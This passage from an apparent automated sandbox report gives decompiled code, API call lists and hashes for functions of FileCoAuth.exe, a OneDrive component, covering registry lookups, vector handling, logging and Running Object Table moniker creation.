    				_t209 =  *0xeb0078; // 0xea6fb0
    				E00E98198(_t212 - 0x88, _t213, _t209, E00E94E74(_t209));
    				 *((intOrPtr*)(_t212 - 0x48)) = 0;
    				 *((intOrPtr*)(_t212 - 0x44)) = 0;
    				 *((intOrPtr*)(_t212 - 0x44)) = 7;
    				 *((intOrPtr*)(_t212 - 0x48)) = 0;
    				 *((short*)(_t212 - 0x58)) = 0;
    				 *(_t212 - 4) = 1;
    				if( *((intOrPtr*)(_t212 + 0x10)) == 0 ||  *((intOrPtr*)(_t212 + 0x14)) != 0) {
    					E00E94E9D(_t212 - 0x40,  *0xeb0080);
    					 *(_t212 - 4) = 3;
    					_t210 =  *((intOrPtr*)(_t212 + 0x1c));
    					_t125 = E00E9F290(0x80000001, _t212 - 0x88, _t212 - 0x40,  *((intOrPtr*)(_t212 + 0x1c)), _t212 - 0x58);
    					__eflags = _t125;
    					_t172 = 0 | _t125 > 0x00000000;
    					 *(_t212 - 4) = 1;
    					E00E94307(_t212 - 0x40, 1, 0);
    					__eflags = _t172;
    					if(_t172 == 0) {
    						goto L15;
    					}
    					__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 8;
    					if( *((intOrPtr*)(_t206 + 0x14)) >= 8) {
    						_t206 =  *_t206;
    					}
    					_push(1);
    					_push(0xffffffff);
    					_push(_t206);
    					goto L8;
    				} else {
    					E00E94E9D(_t212 - 0x40,  *0xeb0084);
    					 *(_t212 - 4) = 2;
    					_t210 =  *((intOrPtr*)(_t212 + 0x1c));
    					_t172 = 0 | E00E9F290(0x80000001, _t212 - 0x88, _t212 - 0x40,  *((intOrPtr*)(_t212 + 0x1c)), _t212 - 0x58) > 0x00000000;
    					 *(_t212 - 4) = 1;
    					E00E94307(_t212 - 0x40, 1, 0);
    					if(_t172 == 0) {
    						L15:
    						 *((char*)(_t212 - 0x89)) = 1;
    						if(_t172 != 0) {
    							L20:
    							_t173 = 1;
    							L21:
    							 *(_t212 - 4) = 0;
    							E00E94307(_t212 - 0x58, 1, 0);
    							 *(_t212 - 4) =  *(_t212 - 4) | 0xffffffff;
    							E00E94307(_t212 - 0x88, 1, 0);
    							return E00EA3152(_t173, _t206, _t210);
    						}
    						E00E94E9D(_t212 - 0x40,  *0xeb0070);
    						 *(_t212 - 4) = 8;
    						E00E95904(_t212 - 0x40,  *((intOrPtr*)(_t212 - 0x90)), 0, 0xffffffff);
    						 *((intOrPtr*)(_t212 - 0x18)) = 0;
    						 *((intOrPtr*)(_t212 - 0x14)) = 0;
    						 *((intOrPtr*)(_t212 - 0x14)) = 7;
    						 *((intOrPtr*)(_t212 - 0x18)) = 0;
    						 *((short*)(_t212 - 0x28)) = 0;
    						 *(_t212 - 4) = 9;
    						E00E94E9D(_t212 - 0x70, 0xea7340);
    						 *(_t212 - 4) = 0xa;
    						_t138 = E00E9F290(0x80000001, _t212 - 0x40, _t212 - 0x70, _t210, _t212 - 0x28);
    						 *(_t212 - 4) = 9;
    						E00E94307(_t212 - 0x70, 1, 0);
    						if((0 | _t138 > 0x00000000) != 0) {
    							 *((char*)(_t212 - 0x89)) =  *((intOrPtr*)(_t212 - 0x18)) == 0;
    						}
    						 *(_t212 - 4) = 8;
    						E00E94307(_t212 - 0x28, 1, 0);
    						 *(_t212 - 4) = 1;
    						E00E94307(_t212 - 0x40, 1, 0);
    						if( *((char*)(_t212 - 0x89)) != 0) {
    							goto L20;
    						} else {
    							_t173 = 0;
    							goto L21;
    						}
    					}
    					_push(1);
    					_push(0xffffffff);
    					_push(L"{a52bba46-e9e1-435f-b3d9-28daa648c0f6}");
    					L8:
    					_t206 = __imp__CompareStringOrdinal;
    					_t143 =  >=  ?  *((void*)(_t212 - 0x58)) : _t212 - 0x58;
    					_t172 = _t172 & 0xffffff00 |  *_t206( >=  ?  *((void*)(_t212 - 0x58)) : _t212 - 0x58, 0xffffffff) != 0x00000002;
    					_t220 = _t172;
    					if(_t172 == 0) {
    						 *((intOrPtr*)(_t212 - 0x18)) = 0;
    						 *((intOrPtr*)(_t212 - 0x14)) = 0;
    						 *((intOrPtr*)(_t212 - 0x14)) = 7;
    						 *((intOrPtr*)(_t212 - 0x18)) = 0;
    						 *((short*)(_t212 - 0x28)) = 0;
    						 *(_t212 - 4) = 4;
    						E00E94E9D(_t212 - 0x40, L"Software\\Classes\\CLSID\\");
    						 *(_t212 - 4) = 5;
    						E00E95904(_t212 - 0x40,  *((intOrPtr*)(_t212 - 0x90)), 0, 0xffffffff);
    						_t211 =  *0xeb006c; // 0xea6ea4
    						E00E98198(_t212 - 0x40, _t220, _t211, E00E94E74(_t211));
    						E00E94E9D(_t212 - 0x70, 0xea7340);
    						 *(_t212 - 4) = 6;
    						_t210 =  *((intOrPtr*)(_t212 + 0x1c));
    						_t177 = 0 | E00E9F290(0x80000001, _t212 - 0x40, _t212 - 0x70,  *((intOrPtr*)(_t212 + 0x1c)), _t212 - 0x28) > 0x00000000;
    						 *(_t212 - 4) = 5;
    						E00E94307(_t212 - 0x70, 1, 0);
    						_t222 = _t177;
    						if(_t177 == 0) {
    							_t172 = 1;
    						} else {
    							_push(1);
    							_push( *((intOrPtr*)(_t212 - 0x94)));
    							_push(_t212 - 0x70);
    							_t200 = E00EA16B7(_t177, _t204, _t206, _t210, _t222);
    							 *(_t212 - 4) = 7;
    							if( *((intOrPtr*)(_t200 + 0x14)) >= 8) {
    								_t200 =  *_t200;
    							}
    							_t161 =  >=  ?  *((void*)(_t212 - 0x28)) : _t212 - 0x28;
    							_t172 = _t177 & 0xffffff00 |  *_t206( >=  ?  *((void*)(_t212 - 0x28)) : _t212 - 0x28, 0xffffffff, _t200, 0xffffffff, 1) != 0x00000002;
    							 *(_t212 - 4) = 5;
    							E00E94307(_t212 - 0x70, 1, 0);
    						}
    						 *(_t212 - 4) = 4;
    						E00E94307(_t212 - 0x40, 1, 0);
    						 *(_t212 - 4) = 1;
    						E00E94307(_t212 - 0x28, 1, 0);
    					}
    					goto L15;
    				}
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA2350
      • Part of subcall function 00E95904: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
      • Part of subcall function 00E95904: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
    • CompareStringOrdinal.KERNEL32(?,000000FF,?,000000FF,00000001,00000001,00000000,00EA6FB0,00000000,?,00000000,000000FF,Software\Classes\CLSID\,00000088,00EA26BC,?), ref: 00EA2490
    • CompareStringOrdinal.KERNEL32(?,000000FF,00000000,000000FF,00000001,?,?,00000001,00000001,00000000,00EA7340,00EA6EA4,00000000,?,00000000,000000FF), ref: 00EA256B
      • Part of subcall function 00E9F290: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00E9F2D9
      • Part of subcall function 00E9F290: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 00E9F328
      • Part of subcall function 00E9F290: RegCloseKey.ADVAPI32(?), ref: 00E9F374
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CompareOrdinalString$??3@CloseH_prolog3_OpenQueryValueXlength_error@std@@Xout_of_range@std@@
    • String ID: Software\Classes\CLSID\${a52bba46-e9e1-435f-b3d9-28daa648c0f6}
    • API String ID: 3309761805-4174548148
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 27%
    			E00E98B58(signed int __ecx, intOrPtr* _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
    				signed int _v8;
    				char _v12;
    				signed int _v16;
    				intOrPtr* _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t75;
    				signed int _t80;
    				signed int _t90;
    				intOrPtr _t91;
    				signed int _t105;
    				signed int _t120;
    				void* _t121;
    				unsigned int _t122;
    				signed int _t123;
    				void* _t124;
    				signed int _t125;
    				signed int _t128;
    				signed int _t130;
    				signed int _t131;
    				signed int _t133;
    				char _t139;
    				intOrPtr* _t140;
    				intOrPtr _t144;
    				intOrPtr* _t145;
    				void* _t146;
    				intOrPtr _t147;
    				signed int _t150;
    				signed int _t159;
    				intOrPtr* _t162;
    				signed int _t164;
    				void* _t169;
    				void* _t170;
    				intOrPtr _t171;
    				char _t173;
    				unsigned int _t175;
    				signed int _t176;
    				signed int _t177;
    				signed int _t178;
    
    				_t75 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t75 ^ _t178;
    				_t153 = _a8;
    				_t162 = __ecx;
    				_v20 = _a4;
    				_t133 = _a12;
    				_v16 = __ecx;
    				_v32 = _t133;
    				_t80 = _t153 -  *__ecx >> 2;
    				_v24 = _t153;
    				_v28 = _t80;
    				if(_t133 != 0) {
    					_push(_t121);
    					_t122 =  *(__ecx + 4);
    					_push(_t170);
    					_t171 =  *((intOrPtr*)(__ecx + 8));
    					if(_t171 - _t122 >> 2 >= _t133) {
    						L15:
    						_push(_v20);
    						_t173 =  *_a16;
    						if(_t122 - _t153 >> 2 >= _t133) {
    							_t90 = _t133 << 2;
    							_t139 = _t122 - _t90;
    							_v32 = _t90;
    							_push(_t139);
    							_push(_t139);
    							_v12 = _t139;
    							_t91 = E00E9906D(_t139, _t122, _t122);
    							_t153 = _a8;
    							_t140 = _v12;
    							 *((intOrPtr*)(_t162 + 4)) = _t91;
    							if(_t153 != _t140) {
    								_t124 = _t122 - _t140;
    								do {
    									_t140 = _t140 - 4;
    									 *((intOrPtr*)(_t140 + _t124)) =  *_t140;
    									_t153 = _a8;
    								} while (_t153 != _t140);
    							}
    							_t123 = _v32;
    							if(_t153 != _t123 + _t153) {
    								do {
    									 *_t153 = _t173;
    									_t153 = _t153 + 4;
    								} while (_t153 != _a8 + _t123);
    							}
    							L27:
    						} else {
    							_v12 = _t173;
    							_t164 = _t133 << 2;
    							_push(_t133);
    							_push(_t133);
    							E00E9906D(_v24, _t122, _t164 + _t153);
    							_t125 = _v16;
    							_push(_v20);
    							_t144 =  *((intOrPtr*)(_t125 + 4));
    							_push(_t144);
    							_push(_t144);
    							E00E98F37(_t144, _v32 - (_t144 - _a8 >> 2),  &_v12);
    							 *((intOrPtr*)(_t125 + 4)) =  *((intOrPtr*)(_t125 + 4)) + _t164;
    							_t153 = 0;
    							_t145 = _a8;
    							_t169 =  >  ? 0 :  *((intOrPtr*)(_t125 + 4)) - _t164 - _t145 + 3 >> 2;
    							if(_t169 != 0) {
    								do {
    									_t153 = _t153 + 1;
    									 *_t145 = _t173;
    									_t145 = _t145 + 4;
    								} while (_t153 != _t169);
    							}
    							_t162 = _v16;
    						}
    					} else {
    						_t128 = _t122 -  *__ecx >> 2;
    						if(0x3fffffff - _t128 < _t133) {
    							__imp__?_Xlength_error@std@@YAXPBD@Z("vector<T> too long");
    						}
    						_t105 = _t128 + _t133;
    						_t175 = _t171 -  *_t162 >> 2;
    						_t133 = 0;
    						_v24 = _t105;
    						_t122 = _t175 >> 1;
    						_v16 = 0;
    						if(0x3fffffff - _t122 >= _t175) {
    							_t176 = _t175 + _t122;
    						} else {
    							_t176 = 0;
    						}
    						_t177 =  <  ? _v24 : _t176;
    						if(_t177 == 0) {
    							L11:
    							_push(_v20);
    							_t130 = _v32;
    							_t159 = _t153 -  *_t162 >> 2;
    							_push(_t133);
    							_push(_t133);
    							_v24 = _t159;
    							_t146 = _t133 + _t159 * 4;
    							E00E98F37(_t146, _t130, _a16);
    							_push(_v20);
    							_push(_t146);
    							_push(_t146);
    							_t147 =  *_t162;
    							E00E9906D(_t147, _a8, _v16);
    							_push(_v20);
    							_t153 =  *((intOrPtr*)(_t162 + 4));
    							_push(_t147);
    							_push(_t147);
    							E00E9906D(_a8,  *((intOrPtr*)(_t162 + 4)), _v16 + (_v24 + _t130) * 4);
    							_t131 = _t130 + ( *((intOrPtr*)(_t162 + 4)) -  *_t162 >> 2);
    							if( *_t162 != 0) {
    								__imp__??3@YAXPAX@Z( *_t162);
    							}
    							_t150 = _v16;
    							 *_t162 = _t150;
    							 *((intOrPtr*)(_t162 + 8)) = _t150 + _t177 * 4;
    							 *((intOrPtr*)(_t162 + 4)) = _t150 + _t131 * 4;
    						} else {
    							if(_t177 > 0x3fffffff) {
    								L14:
    								__imp__?_Xbad_alloc@std@@YAXXZ();
    								goto L15;
    							} else {
    								_t120 = _t177 << 2;
    								__imp__??2@YAPAXI@Z(_t120);
    								_t133 = _t120;
    								_v16 = _t133;
    								if(_t133 == 0) {
    									goto L14;
    								} else {
    									_t153 = _a8;
    									goto L11;
    								}
    							}
    						}
    					}
    					_t80 = _v28;
    					_pop(_t170);
    					_pop(_t121);
    				}
    				 *_v20 =  *_t162 + _t80 * 4;
    				return E00EA29F2(_t121, _v8 ^ _t178, _t153, _t162, _t170);
    				goto L27;
    			}

    APIs
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,00EB23A0,?,?,?,?,00E98F1B,?,?,00EB23A0,?,BB40E64E), ref: 00E98BC0
    • ??2@YAPAXI@Z.MSVCR120 ref: 00E98C08
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E98C77
    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(00EB23A0,?,?,?,?,00E98F1B,?,?,00EB23A0,?,BB40E64E), ref: 00E98C94
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??2@??3@Xbad_alloc@std@@Xlength_error@std@@
    • String ID: vector<T> too long
    • API String ID: 61914137-3788999226
    • Opcode ID: 5e1dd2016b379d1060496ef5b39997704fe14155d91e87820b4ac595ef2e7203
    • Instruction ID: 9008eaa541dc172509e6cbda5511f7349acdde6f942f3d7f55e3bdef7f94b9c5
    • Opcode Fuzzy Hash: 5e1dd2016b379d1060496ef5b39997704fe14155d91e87820b4ac595ef2e7203
    • Instruction Fuzzy Hash: 5E814EB5E0011AAFCF18CF68C9848AEB7B5FF59314B24862DE815E7355DB31AD11CB50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 81%
    			E00E9CFC5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
    				void* _t56;
    				void* _t60;
    				void* _t65;
    				signed int _t71;
    				intOrPtr _t91;
    				intOrPtr _t93;
    				intOrPtr* _t94;
    				intOrPtr _t95;
    				void* _t96;
    
    				E00EA3194(E00EA47C5, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t96 - 0x17c)) = __ecx;
    				_t91 =  *((intOrPtr*)(_t96 + 8));
    				_t93 = __ecx + 0x40;
    				 *((intOrPtr*)(_t96 - 0x180)) = _t93;
    				__imp___Mtx_lock(_t93, 0x20c);
    				E00E9E349(__ecx);
    				 *(_t96 - 4) = 0;
    				 *((intOrPtr*)(_t96 - 0x18)) = 0;
    				_t71 = 1;
    				 *((intOrPtr*)(_t96 - 0x14)) = 0;
    				 *((intOrPtr*)(_t96 - 0x14)) = 7;
    				 *((intOrPtr*)(_t96 - 0x18)) = 0;
    				 *((short*)(_t96 - 0x28)) = 0;
    				 *(_t96 - 4) = 1;
    				_t94 =  *((intOrPtr*)(_t96 - 0x17c));
    				do {
    					E00E97773(_t71, _t96 - 0x218, _t91, _t94, 1);
    					 *(_t96 - 4) = 2;
    					E00E97EF0(_t71, _t91, _t94, 1);
    					__imp__??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@I@Z(_t96 - 0x218, L"Business", _t71, 2, 1);
    					E00E953DD(_t96 - 0x174, _t91, _t94, 1);
    					 *(_t96 - 4) = 3;
    					_t56 = E00E9817A(_t96 - 0x218, _t96 - 0x40);
    					 *(_t96 - 4) = 4;
    					 *((char*)(_t96 - 0x175)) =  *((intOrPtr*)( *_t94 + 0x14))(_t56, _t96 - 0x174);
    					 *(_t96 - 4) = 3;
    					E00E94307(_t96 - 0x40, 1, 0);
    					if( *((char*)(_t96 - 0x175)) == 0 ||  *((char*)(_t96 - 0xf8)) == 0) {
    						 *((char*)(_t96 - 0x175)) = 0;
    						_t60 = E00E9817A(_t96 - 0x218, _t96 - 0x58);
    						 *(_t96 - 4) = 5;
    						E00E990AD(_t96 - 0x28, _t60);
    						 *(_t96 - 4) = 3;
    						E00E94307(_t96 - 0x58, 1, 0);
    					}
    					_t71 = _t71 + 1;
    					 *(_t96 - 4) = 2;
    					E00E94681(_t96 - 0x174);
    					 *(_t96 - 4) = 1;
    					E00E97E2A();
    				} while ( *((char*)(_t96 - 0x175)) != 0);
    				_t95 =  *((intOrPtr*)(_t96 - 0x180));
    				_t64 = _t96 - 0x28;
    				if(_t91 != _t96 - 0x28) {
    					E00E94BDD(_t91, _t64, 0, 0xffffffff);
    				}
    				 *(_t96 - 4) = 0;
    				_t65 = E00E94307(_t96 - 0x28, 1, 0);
    				 *(_t96 - 4) =  *(_t96 - 4) | 0xffffffff;
    				__imp___Mtx_unlock(_t95);
    				E00E9E349(_t65);
    				return E00EA3152(_t71, _t91, _t95);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9CFCF
    • _Mtx_lock.MSVCP120(?,0000020C), ref: 00E9CFE9
      • Part of subcall function 00E9E349: ?_Throw_C_error@std@@YAXH@Z.MSVCP120(00000000,?,00E9BECC,00000000,00000004,00E9BE52), ref: 00E9E357
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,Business,00000001,00000002,00000001,?,?,?,?,?,00000000), ref: 00E9D042
      • Part of subcall function 00E953DD: __EH_prolog3.LIBCMT ref: 00E953E4
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • _Mtx_unlock.MSVCP120(00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 00E9D12E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$H_prolog3$??0?$basic_ios@_??0?$basic_ostream@_??3@??6?$basic_ostream@_?setstate@?$basic_ios@_C_error@std@@H_prolog3_H_prolog3_catchMtx_lockMtx_unlockThrow_V01@V?$basic_streambuf@_W@std@@@1@_
    • String ID: Business
    • API String ID: 358461171-4054125678
    • Opcode ID: 118a776a5d451a96dda8970cd63acda2731080c8b613464d50ba6318489a524e
    • Instruction ID: 7cedc73b54c32289bf241ff4b8e86e8c08fc5e54a7e1fc91cd1a61c8826646d0
    • Opcode Fuzzy Hash: 118a776a5d451a96dda8970cd63acda2731080c8b613464d50ba6318489a524e
    • Instruction Fuzzy Hash: A2419E70805298EEDF11DBA4CC4ABDDBBB4AF15304F1451C8E149B71D2DBB01B89CB92
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 60%
    			E00E94896(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t33;
    				signed int* _t41;
    				signed int _t44;
    				intOrPtr* _t51;
    				signed int _t53;
    				void* _t54;
    
    				_t52 = __esi;
    				_push(0xc);
    				E00EA3194(E00EA3822, __ebx, __edi, __esi);
    				_t41 =  *(_t54 + 0xc);
    				_t51 =  *((intOrPtr*)(_t54 + 8));
    				if(_t41 != 0) {
    					 *(_t54 - 0x18) =  *(_t54 - 0x18) & 0x00000000;
    					 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
    					_t43 =  *(__ecx + 4);
    					_t53 = E00E954D0( *(__ecx + 4), __eflags, _t51, _t54 - 0x18);
    					__eflags = _t53;
    					if(_t53 < 0) {
    						__eflags = _t53 - 0x800401e3;
    						if(_t53 != 0x800401e3) {
    							__eflags = _t53 - 0x8000ffff;
    							_t52 =  ==  ? 0x80040b05 : _t53;
    						} else {
    							_t52 = 0x80040b04;
    						}
    						L18:
    						__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 8;
    						if( *((intOrPtr*)(_t51 + 0x14)) >= 8) {
    							_t51 =  *_t51;
    						}
    						E00E94488(_t43, _t51, _t52);
    						 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
    						_t44 =  *(_t54 - 0x18);
    						__eflags = _t44;
    						if(_t44 != 0) {
    							 *((intOrPtr*)( *_t44 + 8))(_t44);
    						}
    						goto L23;
    					}
    					_t33 =  *(_t54 - 0x18);
    					_t43 = 0;
    					 *(_t54 - 0x14) = 0;
    					__eflags = _t33;
    					if(_t33 != 0) {
    						__eflags =  *((intOrPtr*)( *_t33))(_t33, 0xea7578, _t54 - 0x14);
    						_t43 =  <  ? 0 :  *(_t54 - 0x14);
    						 *(_t54 - 0x14) = _t43;
    					}
    					 *(_t54 - 4) = 1;
    					__eflags = _t53;
    					if(_t53 != 0) {
    						__eflags = _t53 - 1;
    						if(_t53 == 1) {
    							L12:
    							_t52 = 0x80040b02;
    							goto L13;
    						}
    						__eflags = _t43;
    						if(_t43 == 0) {
    							goto L12;
    						}
    						goto L11;
    					} else {
    						__eflags = _t43;
    						if(_t43 != 0) {
    							L11:
    							 *_t41 = _t43;
    							 *((intOrPtr*)( *_t43 + 4))(_t43);
    							_t52 = 0;
    							L8:
    							_t43 =  *(_t54 - 0x14);
    							L13:
    							 *(_t54 - 4) = 0;
    							__eflags = _t43;
    							if(_t43 != 0) {
    								 *((intOrPtr*)( *_t43 + 8))(_t43);
    							}
    							goto L18;
    						}
    						__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\24\\client\\onedrive\\product\\filecoauth\\filecoauth\\storageproviderfinder.cpp", 0x7a, "StorageProviderFinder::GetStorageProviderFromRot", 0xea7810, 0xf4affc1d, 1, _t43, _t43);
    						__imp__?LoggingRotateIfNeeded@@YGXXZ();
    						_t52 = 0x80040b01;
    						goto L8;
    					}
    				} else {
    					L23:
    					return E00EA3152(_t41, _t51, _t52);
    				}
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9489D
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,0000007A,StorageProviderFinder::GetStorageProviderFromRot,00EA7810,F4AFFC1D,00000001,00000000,00000000,?,?,?,?,?,?,0000000C), ref: 00E94922
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,?,?,?,?,?,0000000C), ref: 00E94928
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E9491D
    • StorageProviderFinder::GetStorageProviderFromRot, xrefs: 00E94916
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@H_prolog3_Needed@@Parameter@@@RotateWrite
    • String ID: StorageProviderFinder::GetStorageProviderFromRot$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 1253850681-509154929
    • Opcode ID: bdb0aab5c24ba3b6a12ec80976e8bfb1469cc751f0e631a27dd3ca8e716c4aac
    • Instruction ID: 3326dcf1952dab54fc1d2c83b66780168616b99d71469f64f491decefc82b7c0
    • Opcode Fuzzy Hash: bdb0aab5c24ba3b6a12ec80976e8bfb1469cc751f0e631a27dd3ca8e716c4aac
    • Instruction Fuzzy Hash: 7A31C2B0A142179BDF28DB64C849E6FB764AF9A319F25516CF841BB290C734AE01C791
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 72%
    			E00E955FD(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
    				void* _t31;
    				void* _t38;
    				intOrPtr _t44;
    				intOrPtr _t46;
    				void* _t48;
    				intOrPtr* _t52;
    				signed int _t53;
    				void* _t61;
    				intOrPtr* _t63;
    				void* _t69;
    				void* _t70;
    
    				_t70 = __eflags;
    				_push(0x54);
    				E00EA3194(E00EA399C, __ebx, __edi, __esi);
    				_t63 = __ecx;
    				_t48 = _t69 - 0x30;
    				_t46 =  *((intOrPtr*)(_t69 + 0xc));
    				 *((intOrPtr*)(_t69 - 0x30)) = 0;
    				E00E9851B(_t48, "RunningObjectTableHelper::CreateMoniker");
    				_push(_t48);
    				 *((intOrPtr*)(_t69 - 4)) = 0;
    				_t31 = E00E956FA(_t46, _t69 - 0x60,  *((intOrPtr*)(_t69 + 8)), __ecx,  *((intOrPtr*)(_t69 + 8)), _t70);
    				 *((char*)(_t69 - 4)) = 1;
    				E00E95758(_t69 - 0x60, _t69 - 0x48, _t31, E00E987B8(_t46, _t69 - 0x60,  *((intOrPtr*)(_t69 + 8)), _t63, _t31, _t70));
    				 *((char*)(_t69 - 4)) = 3;
    				E00E94307(_t69 - 0x60, 1, 0);
    				 *(_t69 - 0x28) = "monikerName";
    				_t52 =  >=  ?  *((void*)(_t69 - 0x48)) : _t69 - 0x48;
    				 *((intOrPtr*)(_t69 - 0x2c)) = 1;
    				 *((intOrPtr*)(_t69 - 0x24)) = _t52;
    				if(_t52 == 0) {
    					_t53 = 0;
    				} else {
    					_t17 = _t52 + 2; // 0x3
    					_t61 = _t17;
    					do {
    						_t44 =  *_t52;
    						_t52 = _t52 + 2;
    					} while (_t44 != 0);
    					_t53 = _t52 - _t61 >> 1;
    				}
    				 *(_t69 - 0x1c) = _t53;
    				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\runningobjecttablehelper.cpp", 0x7b, "RunningObjectTableHelper::CreateMoniker", 0xea7d10, 0x4664ad81, 1, 1, _t69 - 0x2c);
    				__imp__?LoggingRotateIfNeeded@@YGXXZ();
    				_t60 =  >=  ?  *((void*)(_t69 - 0x48)) : _t69 - 0x48;
    				_t38 =  *((intOrPtr*)( *_t63 + 0x260))(0xea7684,  >=  ?  *((void*)(_t69 - 0x48)) : _t69 - 0x48, _t46);
    				E00E94307(_t69 - 0x48, 1, 0);
    				E00E98588();
    				return E00EA3152(_t46, _t63, _t38);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E95604
      • Part of subcall function 00E956FA: __EH_prolog3.LIBCMT ref: 00E95701
      • Part of subcall function 00E987B8: __EH_prolog3_GS.LIBCMT ref: 00E987BF
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
